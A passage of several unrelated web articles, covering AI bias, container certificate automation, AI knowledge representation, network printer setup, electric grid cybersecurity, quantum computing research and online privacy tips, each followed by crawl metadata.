peril,” in The Harvard Gazette. “Part of the appeal of algorithmic decision-making is that it seems to offer an objective way of overcoming human subjectivity, bias, and prejudice,” Sandel says. “But we are discovering that many of the algorithms that decide who should get parole, for example, or who should be presented with employment opportunities or housing … replicate and embed the biases that already exist in our society.” 2. Why does bias exist in AI? To figure out how to remove or at least reduce bias in AI decision-making platforms, we have to consider why it exists in the first place. Take the AI chatbot training story in 2016. The chatbot was set up by Microsoft to hold conversations on Twitter, interacting with users through tweets and direct messaging. In other words, the general public had a large part in determining the chatbot’s “personality.” Within a few hours of its release, the chatbot was replying to users with offensive and racist messages, having been trained on anonymous public data, which was immediately co-opted by a group of people. The chatbot was heavily influenced in a conscious way, but it’s often not so clear-cut. In their joint article, “What Do We Do About the Biases in AI” in the Harvard Business Review, James Manyika, Jake Silberg, and Brittany Presten say that implicit human biases — those which people don’t realize they hold — can significantly impact AI. Bias can creep into algorithms in several ways, the article says. 
It can include biased human decisions or reflect “historical or social inequities, even if sensitive variables such as gender, race, or sexual orientation are removed.” As an example, the researchers point to Amazon, which stopped using a hiring algorithm after finding it favored applications based on words like “executed” or “captured,” which were more commonly included on men’s resumes. Flawed data sampling is another concern, the trio writes, when groups are overrepresented or underrepresented in the training data that teaches AI algorithms to make decisions. For example, facial analysis technologies analyzed by MIT researchers Joy Buolamwini and Timnit Gebru had higher error rates for minorities, especially minority women, potentially due to underrepresented training data. 3. How can we reduce bias in AI? In the McKinsey Global Institute article, “Tackling bias in artificial intelligence (and in humans),” Jake Silberg and James Manyika lay out six guidelines AI creators can follow to reduce bias in AI: - Be aware of the contexts in which AI can help correct for bias as well as where there is a high risk that AI could exacerbate bias - Establish processes and practices to test for and mitigate bias in AI systems - Engage in fact-based conversations about potential biases in human decisions - Fully explore how humans and machines can work best together - Invest more in bias research, make more data available for research, while respecting privacy, and adopt a multidisciplinary approach - Invest more in diversifying the AI field itself The researchers acknowledge that these guidelines won’t eliminate bias altogether, but when applied consistently, they have the potential to significantly improve on the situation.
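One concrete problem described above, flawed data sampling (groups over- or under-represented in the training data), can at least be measured before a model is trained. A minimal, illustrative sketch; the group labels, counts, and the 10% warning threshold are invented for demonstration.

```python
from collections import Counter

def representation_report(records: list[dict], group_key: str = "group",
                          warn_below: float = 0.10) -> dict[str, float]:
    """Report each group's share of the dataset and flag under-represented ones."""
    counts = Counter(r[group_key] for r in records)
    total = sum(counts.values())
    shares = {group: n / total for group, n in counts.items()}
    for group, share in sorted(shares.items(), key=lambda kv: kv[1]):
        flag = "  <-- under-represented" if share < warn_below else ""
        print(f"{group:>12}: {share:6.1%}{flag}")
    return shares

# Toy data: one group makes up only a small slice of the samples.
data = ([{"group": "group_a"}] * 700 + [{"group": "group_b"}] * 260 +
        [{"group": "group_c"}] * 40)
representation_report(data)
```

A report like this does not remove bias on its own, but it makes the second guideline above (testing for and mitigating bias) measurable rather than aspirational.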
<urn:uuid:25215c8b-ef01-4e55-adaa-4a7af1223b84>
CC-MAIN-2022-40
https://www.datamation.com/artificial-intelligence/bias-in-ai/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00051.warc.gz
en
0.94859
1,056
3.640625
4
To meet the speed, reliability, and security requirements of the modern world, enterprise development teams must change their tools, methods, and application delivery practices. Gone are the long, drawn-out waterfall-based SDLCs that produce monolithic, hard-to-change applications. They have been replaced by new methods that rely on portable, scalable, lightweight, and reusable containers that package code, libraries, configuration files, and all other dependencies – enabling software to run reliably in multiple environments. By abstracting the underlying host infrastructure from the application platform, containers allow DevOps teams to easily compile applications to run in dev, prod, staging, or test environments – saving time and resources, and accelerating release cycles. To manage and orchestrate containers that are deployed across multiple machines, teams use Kubernetes – an open source engine that offers services for scheduling and deploying containers, and scaling them based on utilization. Docker is perhaps the most widely used tool for placing software into containers. A number of public repositories, such as Docker Hub, exist to facilitate the sharing of containers between teams. For authentication, Kubernetes requires PKI certificates – both to run the cluster (thus enabling communication between container functions) and to encrypt the traffic passing within the application that runs inside the container. (For details on which certificates are required by a cluster, click here.) If you use kubeadm – a tool for creating Kubernetes clusters, the required certificates are generated automatically. Security-conscious teams also have the option of generating their own certificates and configuring them for user accounts. Learn to manage certificates for short-lived container environments with full visibility and control. Security challenges in containerized environments Container security can get complicated, mostly because containers themselves are more complex than traditional deployment environments. Most organizations run multiple container images, with multiple instances of each image – inadvertently creating a single point of failure: when one container environment is compromised, all applications within each instance are at risk. While generating certificates, security teams often don’t follow standard practices – some certificates are acquired from public CAs, while others are generated in-house. This lack of uniformity can put the PKI infrastructure at risk, especially given the lack of communication between security engineers, developers, and other IT teams. What’s more, certificate renewals and application updates are not synchronized, creating potential security vulnerabilities. If application updates are typically released on a bi-weekly or monthly cycle, certificates are renewed annually – a disconnect which can result in serious problems for organizations. When legacy applications are no longer updated, but are still in use, security teams still need to remember to renew their certificates, which can be problematic – given that most organizations still store their certificates in spreadsheets or homegrown applications, without a consistent process for managing their inventory and monitoring for expiry dates. Organizations need an efficient and reliable mechanism for deploying certificates and keys for applications hosted in a container infrastructure. The solution? Automation. 
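Even before full automation is in place, a small script that inventories certificate lifetimes is a step up from the spreadsheets mentioned above. A minimal sketch using only the Python standard library; it checks the certificate presented by a live TLS endpoint, and the hostnames and 30-day warning threshold are illustrative assumptions.

```python
import socket
import ssl
from datetime import datetime, timezone

def days_until_expiry(host: str, port: int = 443, timeout: float = 5.0) -> float:
    """Return the number of days before the TLS certificate served by host:port expires."""
    context = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
    not_after = datetime.fromtimestamp(
        ssl.cert_time_to_seconds(cert["notAfter"]), tz=timezone.utc)
    return (not_after - datetime.now(timezone.utc)).total_seconds() / 86400

if __name__ == "__main__":
    for endpoint in ["example.com", "internal-app.example.local"]:  # illustrative hosts
        try:
            days = days_until_expiry(endpoint)
            warning = "  <-- renew soon" if days < 30 else ""
            print(f"{endpoint}: {days:.0f} days left{warning}")
        except OSError as exc:
            print(f"{endpoint}: could not check ({exc})")
```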
AppViewX CERT+ offers enterprise-grade certificate lifecycle automation The AppViewX CERT+ platform helps enterprises discover and manage certificates, and automate the entire lifecycle of their internal and external PKI in multi-cloud and containerized environments. Automated end-to-end Certificate Lifecycle Management (CLM) is quickly replacing manual processes through integration with a number of key native certificate management tools. Issuing certificates to cert-manager based on policy configured on AppViewX: cert-manager is an OpenShift and Kubernetes certificate management controller tool. It acts as an ACME client and can be used for certificate enrollment and management functions. AppViewX CLM offers an ACME server implementation, which can issue certificates to the ACME client based on enrollment requests from the client. Managing secrets and protecting sensitive data with HashiCorp Vault: HashiCorp Vault secures and controls access to tokens, passwords, certificates, and keys for protecting sensitive data in a dynamic infrastructure. Vault applies a dynamic-secret approach to public key certificates, acting as a signing intermediary to generate short-lived certificates. This allows certificates to be generated on demand and rotated automatically. Organizations can set up their own internal root CA or intermediate CAs to sign certificates issued via Vault. Vault uses a PKI secrets engine to store certificates, keys, and CSRs. AppViewX has configuration properties to act as an RA (registration authority) between Vault (routing the certificate signing request calls) and the CA, using precise policy definitions. Container certificate requirements are managed in a more secure fashion compared to hosting the CA internally. Certificate Management on Istio: A service mesh is a dedicated infrastructure layer that helps control how parts of an application (services that perform different functions) interact and share information. It is designed to route requests for data between services to improve communication and optimize application performance. The best-known open source service mesh platform is Istio – it manages authentication, authorization, and encryption of service communication, allowing organizations to secure service-to-service communication at the network and application layers. Within Istio’s control plane is a certificate generation component called Citadel. With Istio, there are two types of certificate requirements: mTLS encryption and authentication (encryption of control plane and data plane objects), and encryption of the ingress traffic used to access the application from outside. AppViewX offers an Istio-CERT+ plugin, which can be set up as part of the Istio mesh configuration on Kubernetes. Istio-CERT is a modified Citadel plugin that is available as a control plane function. It works by modifying the call that istiod makes to the in-house CA, without affecting the way that a mesh requests certificates. AppViewX adds value by selecting the CA and policy through which the certificate needs to be issued. When using an Istio mesh with the Istio-CERT+ plugin, all control plane and data plane functions get encrypted with certificates issued by AppViewX (acting as the registration authority), providing the mTLS encryption required to secure communication within the mesh. Each time a new application service gets spun up on the data plane, a new certificate request from the Istio agent on the service mesh is routed to the istiod function within the control plane.
Istio-CERT recognizes this request and forwards it to AppViewX, which in turn issues a certificate to the proxy within the application mesh. The certificates are stored with the proxy (Envoy), where they can be read to access the application. AppViewX is also able to support the encryption of the Envoy proxy through Symmetric Key Encryption, or by providing a Vault within it. Implement best-of-breed PKI for your containerized environments with live guidance from our experts. As organizations of all types and sizes switch to component-based application delivery, they need to be mindful of potential security risks. The main advantages of the container infrastructure: scalability and ease of deployment, can become its greatest vulnerabilities if encrypted communication is not properly orchestrated and managed. Most vendors who offer certificate management solutions do not have the ability to support certificate lifecycles within containers. Increasingly, security-conscious enterprises are choosing AppViewX for its ability to provide certificate automation and orchestration capabilities through seamless integration with the tools and processes used by DevOps teams to deploy and run cloud-native, container-based applications.
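For teams experimenting with the Vault pattern described earlier (short-lived certificates generated on demand), Vault's PKI secrets engine exposes this through a plain HTTP API. A rough sketch using the requests library follows; the mount path `pki`, the role name `web-service`, the server address, and the token handling are illustrative assumptions, and in production the token should come from a proper auth method rather than an environment variable.

```python
import os
import requests

VAULT_ADDR = os.environ.get("VAULT_ADDR", "https://vault.example.internal:8200")
VAULT_TOKEN = os.environ["VAULT_TOKEN"]  # illustrative; prefer AppRole/Kubernetes auth

def issue_short_lived_cert(common_name: str, ttl: str = "24h") -> dict:
    """Ask Vault's PKI secrets engine (assumed mounted at 'pki') to issue a
    certificate for the given common name using an assumed 'web-service' role."""
    resp = requests.post(
        f"{VAULT_ADDR}/v1/pki/issue/web-service",
        headers={"X-Vault-Token": VAULT_TOKEN},
        json={"common_name": common_name, "ttl": ttl},
        timeout=10,
    )
    resp.raise_for_status()
    data = resp.json()["data"]
    # 'certificate', 'private_key', and 'issuing_ca' come back PEM-encoded.
    return {
        "certificate": data["certificate"],
        "private_key": data["private_key"],
        "issuing_ca": data["issuing_ca"],
    }

if __name__ == "__main__":
    bundle = issue_short_lived_cert("payments.apps.example.internal")
    print(bundle["certificate"][:80], "...")
```

Because the certificates are deliberately short-lived, a workflow like this only pays off when renewal is automated end to end, which is the argument the article makes for lifecycle tooling.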
<urn:uuid:10e9ecfb-29c3-4119-82a1-50bf9fa26b11>
CC-MAIN-2022-40
https://www.appviewx.com/blogs/managing-certificate-lifecycles-for-container-based-implementations/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00252.warc.gz
en
0.919816
1,539
2.734375
3
Classifying Knowledge Representation In Artificial Intelligence Knowledge Representation Models in Artificial Intelligence Knowledge representation plays a crucial role in artificial intelligence. It has to do with the ‘thinking’ of AI systems and contributes to its intelligent behavior. Knowledge Representation is a radical and new approach in AI that is changing the world. Let’s look into what it is and its applications. Understanding Knowledge Representation and its Use Knowledge Representation is a field of artificial intelligence that is concerned with presenting real-world information in a form that the computer can ‘understand’ and use to ‘solve’ real-life problems or ‘handle’ real-life tasks. The ability of machines to think and act like humans such as understanding, interpreting and reasoning constitute knowledge representation. It is related to designing agents that can think and ensure that such thinking can constructively contribute to the agent’s behavior. In simple words, knowledge representation allows machines to behave like humans by empowering an AI machine to learn from available information, experience or experts. However, it is important to choose the right type of knowledge representation if you want to ensure business success with AI. Four Fundamental Types of Knowledge Representation In artificial intelligence, knowledge can be represented in various ways depending on the structure of the knowledge or the perspective of the designer or even the type of internal structure used. An effective knowledge representation should be rich enough to include the knowledge required to solve the problem. It should be natural, compact and maintainable. Related Reading: 6 Ways Artificial Intelligence Is Driving Decision Making Here are the four fundamental types of knowledge representation techniques: 1. Logical Representation Knowledge and logical reasoning play a huge role in artificial intelligence. However, you often require more than just general and powerful methods to ensure intelligent behavior. Formal logic is the most helpful tool in this area. It is a language with unambiguous representation guided by certain concrete rules. Knowledge representation relies heavily not so much on what logic is used but the method of logic used to understand or decode knowledge. It allows designers to lay down certain vital communication rules to give and acquire information from agents with minimum errors in communication. Different rules of logic allow you to represent different things resulting in an efficient inference. Hence, the knowledge acquired by logical agents will be definite which means it will either be true or false. Although working with logical representation is challenging, it forms the basis for programming languages and enables you to construct logical reasoning. 2. Semantic Network A semantic network allows you to store knowledge in the form of a graphic network with nodes and arcs representing objects and their relationships. It could represent physical objects or concepts or even situations. A semantic network is generally used to represent data or reveal structure. It is also used to support conceptual editing and navigation. A semantic network is simple and easy to implement and understand. It is more natural than logical representation. It allows you to categorize objects in various forms and then link those objects. It also has greater expressiveness than logic representation. Related Reading: Understanding The Different Types Of Artificial Intelligence 3. 
Frame Representation A frame is a collection of attributes and their associated values that describes an entity in the real world. It is a record-like structure consisting of slots and their values. Slots can be of varying sizes and types, and each slot has a name and a value. Slots can also have subfields, called facets, which allow you to put constraints on the frames. There is no limit on the values a facet can take, the number of facets a slot can have, or the number of slots a frame can have. Since a single frame is not very useful on its own, building a frame system by collecting frames that are connected to each other is more beneficial. Frame representation is flexible and can be used by various AI applications. 4. Production Rules Production rule-based representation has many properties essential for knowledge representation. It consists of production rules, a working memory, and a recognize-act cycle. The rules are also called condition-action rules: if the condition of a rule is true according to the current contents of working memory, the action associated with the rule is performed. Although production rules lack precise semantics and are not always efficient, they lead to a higher degree of modularity, and this is one of the most expressive knowledge representation systems. Gain the Benefits of Knowledge Representation Used properly, knowledge representation enables artificial intelligence systems to function with near-human intelligence, even handling tasks that require a huge amount of knowledge. The increasing use of natural language also makes them human-like in their responses. Making the right choice in the type of knowledge representation you incorporate is crucial and will ensure that you get the best out of your artificial intelligence system. If you need help with this, we’re here. Please reach out to us.
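To make the fourth representation concrete, the recognize-act cycle of a production system can be sketched in a few lines: rules are condition-action pairs evaluated against a working memory until nothing more fires. A minimal, illustrative example; the facts and rules are invented for demonstration and are not drawn from any particular system.

```python
# Working memory: a set of facts currently believed to be true.
working_memory = {"engine_cranks", "fuel_tank_empty"}

# Production rules: (condition over working memory, facts the action adds).
rules = [
    (lambda wm: "fuel_tank_empty" in wm,                          {"no_fuel_reaches_engine"}),
    (lambda wm: "no_fuel_reaches_engine" in wm,                   {"engine_will_not_start"}),
    (lambda wm: {"engine_cranks", "engine_will_not_start"} <= wm, {"diagnosis: refuel the car"}),
]

def recognize_act_cycle(wm: set[str]) -> set[str]:
    """Repeatedly fire any rule whose condition matches until no rule adds new facts."""
    changed = True
    while changed:
        changed = False
        for condition, new_facts in rules:
            if condition(wm) and not new_facts <= wm:
                wm |= new_facts          # the 'act' step: add the rule's conclusions
                changed = True
    return wm

print(recognize_act_cycle(set(working_memory)))
```

The modularity mentioned above shows up here directly: each rule can be added, removed, or edited without touching the others or the cycle that drives them.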
<urn:uuid:d009f9bd-4984-4a9e-ae48-b0f2a65f64e4>
CC-MAIN-2022-40
https://www.fingent.com/blog/classifying-knowledge-representation-in-artificial-intelligence/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00252.warc.gz
en
0.929778
997
3.03125
3
TCP/IP printers are preferred to USB printers for several reasons. Not only are they shared more easily over a network, but they are not prone to the broken, intermittent and loose connections that plague USB devices. Before adding a TCP/IP printer to your computer, make sure that you have logged in to the printer’s GUI interface and set up a static IP address. Dynamic addresses will work if you use the printer’s NetBIOS name to connect, but using a static IP address to print directly to a printer is more reliable. To begin, give your printer a static IP address (if it doesn’t have one already), then open Devices and Printers and click the Add Printer button. From the Add Printer dialog box, click ‘Add a local printer’. Click the ‘Create a new port’ radio button and select Standard TCP/IP Port from the drop-down menu. Enter the printer’s IP address in the ‘Hostname or IP address’ field. If a driver is required, you will be prompted to enter the location containing the driver .inf files. When the driver is installed, give the printer a friendly name. Finally, choose sharing options. In a work environment, printers are usually shared only through print servers, so DO NOT share your printer. Doing so would result in multiple instances of the same printer being shared across many PCs on the network.
<urn:uuid:73a61fef-6a90-4810-8533-f801054e960a>
CC-MAIN-2022-40
https://www.falconitservices.com/how-to-add-a-tcp-ip-network-printer/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00252.warc.gz
en
0.880532
287
2.640625
3
Smart Electric Grid Demands Smart Security by Anastasios Arampatzis Security of electric grid is a national security issue The electric grid delivers the electricity that is essential for modern life. The reliability of the grid and its ability to meet consumers’ demands at all times is of national interest. The grid’s reliability can be impaired by cyberattacks on the IT and OT systems that support its operations. Cyber-attacks could result in widespread loss of electrical services including long-duration, large-scale blackouts. High-profile attacks prove not only the severe impact of cyber-attacks against the electric grid, but also that the grid is a lucrative target for adversaries. -A group of hackers allegedly linked to Russia got into the system of a western Ukrainian power company in 2015, cutting power to 225,000 households. A US report into the blackout concluded that a virus was delivered via email through spear-phishing. -The 2016 cyberattack on Ukraine was the second in less than a year. Hackers left customers in parts of Kyiv without electricity for an hour, after disabling an electricity substation. The attack was attributed to Russian hackers, with some experts suggesting that the attack aimed to physically damage the power grid. -Saudi Aramco became the target of cyber-attacks in 2017 when hackers targeted the safety system in one of the company’s petrochemical plants. Experts believe that the attack aimed to not only to shut down the plant but to wipe out data and halt operations. -In March 2019, the US grid regulator NERC reportedly warned that a hacking group with suspected Russian ties was conducting reconnaissance into the networks of American electrical utilities. -The European Network of Transmission System Operators for Electricity (ENTSO-E) – which represents 42 European transmission system operators in 35 countries – said on 9 March 2020 it had recently “found evidence of a successful cyber intrusion into its office network”, and was introducing contingency plans to avoid further attacks. Power and energy are the core of almost everything we do. Nothing in our modern society can function without access to power, and it’s the utility industry that provides that to everybody, which is why this is an urgent matter of national concern, says former U.S. Homeland Security Secretary Michael Chertoff. The vulnerabilities of the energy sector are of particular concern to national security due to its enabling function across all critical infrastructure systems. According to Chertoff and many cybersecurity professionals, the security of the national electric grid is a “real national security issue.” In the European Union, the electric grid entities have been identified as operators of essential services under the Network and Information Systems Directive (NIS Directive). According to the requirements of the NIS Directive, electric gird companies are to have in place measures to prevent risks, ensure security of their network and handle and report incidents. In addition, the Electricity Risk Preparedness Regulation envisages the development of common methods to assess risks to the security of electricity supply, including risks of cyber-attacks; common rules for managing crisis situations and a common framework for better evaluation and monitoring of electricity supply security. Electric grid modernization efforts have increasingly bridged the gap between the physical, operational technology and information technology systems used to operate the grid. 
Previously, operational technology was largely isolated from information technology. But this separation has narrowed as grid operators incorporate new grid management systems and utilities install millions of smart meters and other internet-enabled devices on the grid. While these advanced technologies offer significant improvements in grid operations and real-time system awareness, they also increase the number of points on the grid that malicious actors can target to gain access and compromise larger systems. A recent report by the U.S. Government Accountability Office (GAO) notes that the electric grid faces “significant cybersecurity risks” because “threat actors are becoming increasingly capable of carrying out attacks on the grid.” At the same time, “the grid is becoming more vulnerable to cyberattacks” via: - Industrial Control Systems. The integration of cheaper and more widely available devices that use traditional networking protocols into industrial control systems has led to a larger cyberattack surface for the grid’s systems. - Consumer Internet of Things (IoT) devices connected to the grid’s distribution network. Malicious threat actors could compromise many high-wattage IoT devices (such as air conditioners and heaters) and turn them into a botnet. The malicious actors could then use the botnet to launch a coordinated attack aimed at manipulating the demand across distribution grids. - The Global Positioning System (GPS) The grid is dependent on GPS timing to monitor and control generation, transmission, and distribution functions. Although there is a comprehensive overall legal framework for cybersecurity, the energy sector presents certain particularities that require particular attention: - Real-time requirements Some systems need to react so fast that standard security measures such as authentication of a command or verification of a digital signature can simply not be introduced due to the delay these measures impose. - Cascading effects Electricity grids are strongly interconnected across many countries. An outage in one country might trigger blackouts or shortages of supply in other areas and countries. - Combined legacy systems with new technologies Many elements of the energy system were designed and built well before cybersecurity considerations came into play. This legacy now needs to interact with the most recent state-of-the-art equipment for automation and control, such as smart meters or connected appliances, and IoT devices without being exposed to cyber-threats. In addition to the above considerations, the European Parliament has identified trends that highlight the importance for strong cyber-physical security measures and policies in the electricity sector, including: - Digitalization and automation The move towards a smart grid with more and more networked grid components, from electricity generators to transmission and distribution networks to smart meters in the home affects the security of the gird. All these devices present potential opportunities for attacks or inadvertent disruption. - Sustainable energy With the objective of achieving a climate-neutral energy system, the electricity system will be increasingly decentralized (distributed wind, solar and hydropower installations) and interconnected. In addition, electric vehicles, smart appliances, and flexible industrial demand lead to a dramatic increase of potentially vulnerable networked devices on the electricity grid. 
- Market reform Reforms of the electricity market allow new actors to participate. This includes energy companies, aggregators, and individual citizens. Many of these do not have adequate cybersecurity skills and need to rely on certified equipment, software and service providers. - Capabilities of adversaries Cyber criminals’ skills are constantly evolving and becoming more sophisticated. Automated attack tools have the potential to spread in the network and cause damage beyond the intended target. Artificial intelligence has the potential to boost the capabilities of attackers, as well as the defenders, and can prove to be a critical advantage. - Skills gap With the increasing need for cybersecurity skills, the current shortage of skilled personnel is likely to persist. Information and knowledge sharing will be vital in making the best use of the available skills base. How to address the cybersecurity risks The diverse nature of electric grid entities, the impact of potential cyber-attacks against the grid and the many challenges dictate the need for a holistic, smart approach to measures to prevent and protect from adversaries. In the European Union, the Smart Grids Task Force has released in June 2019 their final report for the “Implementation of Sector-Specific Rules for Cybersecurity.” The report recommends the compliance of responsible entities with two international standards: - ISO/IEC 27001:2013 - ISA/IEC 62433 series Electric grid responsible entities in Europe should also have a look at the NERC CIP standards. The North American Electric Reliability Consortium (NERC) Critical Infrastructure Protection (CIP) framework has been recognized by the European Parliament as “the most detailed and comprehensive cybersecurity standards in the world” which is flexible enough to evolve when necessary, adjusting effectively to the fluctuating cybersecurity environment. A 2018 report from the EU Center of Energy states that: “The United States has favored a strategy of ‘security in depth’ with strict and detailed regulations in specific sectors, which are implemented by institutions possessing coercive powers. The American system can serve as a model to improve certain weaknesses in the European approach.” Both frameworks have the same overarching principles: a risk-based approach, having deep understanding of the threat environment and the assets to be protected. Having visibility into your business environment is the foundation on which all cybersecurity measures can be built. Based on the classification of risks and assets, electric grid entities can then select the appropriate controls – network segmentation, access controls, physical security – to mitigate the imminent threats and minimize the impact of potential adversarial actions. How ADACOM can help The electricity sector has a specific threat profile, that is a mix of threats and risks related to the business needs of the sector, as well as the relation to safety issues, and the entanglement of ICT & Operational Technology. Electric grid entities, no matter their size, should follow a holistic approach towards the protection of their assets and critical infrastructure. 
To do so, ADACOM proposes the adoption of the following:
- A holistic approach to Security Risk Management (addressing all applicable digital, physical and hybrid risks)
- Risk mitigation based on processes and technology tailored to the electricity sector
- Adoption of a continuous and effective risk assessment process
- Usage of cryptographic keys on smart grids for authentication and encryption
- Development and enforcement of an Information Security Management System, based on the concepts of information resilience and the ISA/IEC 62443 series
- Awareness training tailored to the needs of the sector
ADACOM can help electricity and energy organizations safeguard their grid and all of their critical assets and be resilient against cyber incidents, through a comprehensive risk management program, in order to effectively adopt cyber security technology (including IoT certificates) and processes. You may learn more by contacting our experts.
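The recommendation to use cryptographic keys for authenticating grid commands can be made concrete with a short sketch. The snippet below is illustrative only and is not ADACOM's or any utility's actual implementation: the device identifier, message format, and in-code key are assumptions for demonstration, and it uses only Python's standard library.

```python
import hashlib
import hmac
import json
import time

# Assumption: each smart meter or field device shares a per-device secret with
# the head-end system. In practice the key would live in a secure element or
# HSM, never hard-coded like this.
DEVICE_KEY = b"example-per-device-secret"


def sign_command(device_id: str, command: str, key: bytes = DEVICE_KEY) -> dict:
    """Build a grid command with a timestamp and an HMAC-SHA256 tag."""
    payload = {"device": device_id, "command": command, "ts": int(time.time())}
    message = json.dumps(payload, sort_keys=True).encode()
    payload["tag"] = hmac.new(key, message, hashlib.sha256).hexdigest()
    return payload


def verify_command(payload: dict, key: bytes = DEVICE_KEY, max_age_s: int = 5) -> bool:
    """Recompute the tag and reject stale or tampered commands."""
    received_tag = payload.pop("tag", "")
    message = json.dumps(payload, sort_keys=True).encode()
    expected = hmac.new(key, message, hashlib.sha256).hexdigest()
    fresh = (time.time() - payload.get("ts", 0)) <= max_age_s
    return fresh and hmac.compare_digest(received_tag, expected)


if __name__ == "__main__":
    cmd = sign_command("meter-0042", "DISCONNECT")
    print("authentic:", verify_command(dict(cmd)))  # True
    cmd["command"] = "RECONNECT"                    # simulate tampering in transit
    print("tampered:", verify_command(dict(cmd)))   # False
```

A symmetric MAC like this is far cheaper to verify than a full digital signature, which is one pragmatic answer to the real-time constraints mentioned earlier in the article.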
<urn:uuid:35562e94-4a55-41ba-af69-0c4f4e2b61ad>
CC-MAIN-2022-40
https://www.adacom.com/news/press-releases/smart-electric-grid-demands-smart-security/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00252.warc.gz
en
0.939752
2,072
2.703125
3
A team of physicists at Rice University has created an “electron superhighway” that could one day be useful for building a quantum computer — a machine that would utilize quantum particles instead of the digital transistors in today’s microchips. Rui-Rui Du, a professor of physics and astronomy, and graduate student Ivan Knez describe the new method for making the device, known as a “quantum spin Hall topological insulator,” in a paper published in Physical Review Letters, journal of the American Physical Society. The device acts as an electron superhighway — one of the building blocks necessary to create quantum particles that can store and manipulate data. A quantum computer would be unlike traditional silicon-based computers that use binary codes of ones and zeros. Quantum computing is based on “superpositions” and qubits that would allow a computer to store information as both zero and one at the same time. The struggle now is to make qubits more reliable, as the information they hold is lost over time to quantum fluctuations; building qubits that can withstand such errors is known as “fault tolerance.” The new “superhighway” technology will allow intense computing tasks like code-breaking, climate modeling and biomedical simulations to be carried out thousands of times faster, the Rice physicists explained. “In principle, we don’t need many qubits to create a powerful computer. In terms of information density, a silicon microprocessor with one billion transistors would be roughly equal to a quantum processor with 30 qubits,” said Du.
Raw but Real
Early stages of research can be inspiring as well as frustrating. “I’m biased towards any scientific discovery, so my first reaction is ‘cool,'” Steven Savage, technology project manager and Geek 2.0 blogger, told TechNewsWorld. “When my ‘cool’ reaction calms down, it sounds like it’s actually a very sober, interesting step to quantum computing.” That’s just one step among many, however. “Each step is in its own way significant,” said Savage. “This is a difficult area, and it’s being made reality by hundreds or thousands of tiny steps. What’s probably sad is that each step won’t be appreciated when quantum computing is a reality, because we’ll only appreciate the end result.” How soon will we see the benefits of quantum computing? So far, it’s hard to tell when practical applications might appear. “Predicting it seems almost disrespectful of the sheer effort it’ll take,” said Savage. Yet the promises of quantum computing are great. Moore’s Law, which states that the number of transistors that can be placed inexpensively on an integrated circuit doubles approximately every two years, has been strained in recent years. Quantum computing could change that. “This could give us more efficient, faster, and smaller computers,” said Savage. “It’ll ramp up everything we’re doing now even further.”
Still Decades Away
While the advances at Rice University may bring us closer to a day when we might use quantum computing, there is still plenty of work to do and plenty of breakthroughs to accomplish. “I think quantum computing is an idea that bears looking into. It’s research that has been going on for a while,” Charles King, principal analyst at Pund-IT, told TechNewsWorld. “A number of people have taken different approaches to it. They’re working on the subatomic levels to extend Moore’s Law.” Moore’s Law may have reached its limit, which means making significantly faster computers will require new physics discoveries.
“From the standpoint of silicon, we will get to the point where we can’t get any smaller,” said King. “Quantum offers a family of technologies that could be exploited to overcome that. Will it happen anytime soon? Probably not. For applications, we’re probably decades away. I wish these guys the best, and it will be interesting to see what comes down the pike over time.”
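Du's point about information density can be made concrete with a toy calculation. The sketch below is purely illustrative: it simulates qubit amplitudes on a classical machine with NumPy (assumed to be installed) and says nothing about the Rice device itself.

```python
import numpy as np


def uniform_superposition(n_qubits: int) -> np.ndarray:
    """State vector of n qubits placed in an equal superposition.

    A register of n qubits is described by 2**n complex amplitudes, which is
    why capacity grows exponentially with every added qubit.
    """
    dim = 2 ** n_qubits
    return np.full(dim, 1 / np.sqrt(dim), dtype=complex)


# Count amplitudes only; actually storing the 30-qubit vector would need ~16 GB.
for n in (1, 10, 20, 30):
    print(f"{n:2d} qubits -> {2 ** n:,} amplitudes")

# A single qubit in superposition: equal probability of reading 0 or 1.
state = uniform_superposition(1)
print("measurement probabilities:", np.abs(state) ** 2)  # [0.5, 0.5]
```

The 30-qubit case corresponds to roughly a billion amplitudes, which is the comparison Du draws with a billion-transistor microprocessor.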
<urn:uuid:7b18f48d-e2ed-4ab9-9670-3d458e0de421>
CC-MAIN-2022-40
https://www.linuxinsider.com/story/electron-road-work-may-speed-quantum-computing-development-73441.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00252.warc.gz
en
0.938673
893
3.84375
4
Violation of our ‘personal space’ while online is a huge concern. However, the Waze exploit is only a small part of a much wider concern – being tracked online. According to the ‘Are you cyber savvy?’ quiz from Kaspersky Lab, 41% of consumers are uncomfortable with websites tracking their location and online activities, yet do nothing about it. Our habitual online activities like shopping, chatting, and travelling are all recorded and stored by different services. Online merchants, for example, use consumer browsing data to tailor their ads to suit user preferences. Access counters, web analytics tools and social networks also all constantly watch Internet users, track what they do online, and where they are when they do it. Kaspersky Lab has developed several tips to help users feel safe online and minimise possible risks to their privacy.
Seeing is stealing
- Modern mobile devices and applications can collect and transmit data about your location using geolocation services provided by mobile phone towers, nearby Wi-Fi transmitters or signals from GLONASS or GPS satellites. To avoid disclosing your location, deny access to this information in the phone or browser settings when you’re not specifically using it.
Foreseeing the dangers of unknown networks
- When using Wi-Fi, there are ways of protecting against surveillance and increasing your security level, for example, using a VPN (Virtual Private Network).
- Do not enter user names and passwords on websites, and do not use instant messaging, when you are connected to public Wi-Fi. It is not difficult for hackers to intercept traffic on unprotected connections or to create hotspot traps for this purpose.
- If you have to use an unknown Wi-Fi connection, be sure to use a security solution that checks the security level of the wireless connection. Do not ignore its recommendations.
- Do not leave the factory administrator password on your Wi-Fi router – these default passwords are published in the manuals available on manufacturers’ websites. If an attacker gains accidental access to your device settings, it will endanger the safety of your home network.
Loose lips sink ships
